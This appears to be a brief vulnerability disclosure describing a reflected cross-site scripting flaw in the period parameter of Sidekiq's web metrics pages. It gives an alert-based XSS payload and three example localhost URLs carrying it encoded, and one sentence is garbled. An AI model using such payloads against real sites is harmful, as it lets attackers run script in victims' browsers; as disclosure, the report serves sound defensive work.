Reflected XSS attacks, also known as non-persistent attacks, occur when a malicious script is reflected off of a web application to the victim’s browser.
There must have been a metrics during the default value of the period parameter.
You simply have to set the payload in the period parameter.
Payload : "><img/src/onerror=alert(document.domain)>
Example of URL with payload :
https://localhost/sidekiq/metrics?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E
https://localhost/sidekiq/metrics/SanityChecksJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E
https://localhost/sidekiq/metrics/ActiveStorage::PurgeJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E